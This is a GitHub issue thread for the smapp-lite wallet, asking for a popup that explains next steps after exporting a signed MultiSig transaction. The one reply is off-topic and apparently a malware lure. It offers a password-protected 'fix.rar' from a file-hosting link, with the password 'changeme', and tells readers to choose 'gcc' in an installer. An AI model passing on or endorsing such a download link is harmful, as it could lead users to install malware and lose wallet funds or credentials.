### ISSUE TITLE
Add success screen with further instruction after Sign & Export

### ISSUE THREAD

**Issue by brusherru** [spacemeshos/smapp-lite#74]
To help users go through sending MultiSig transactions experience we need to:
- close the verify tx popup (go back to "send tx" popup)
- open the special popup on top, which will say what to do next:
  - send the exported file to other parties,
  - or if you own other keys — import the file and sign again,
  - add details that signatures might be collected in sync or async way, so it is possible to combine all signatures as the last step by importing multiple files,

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
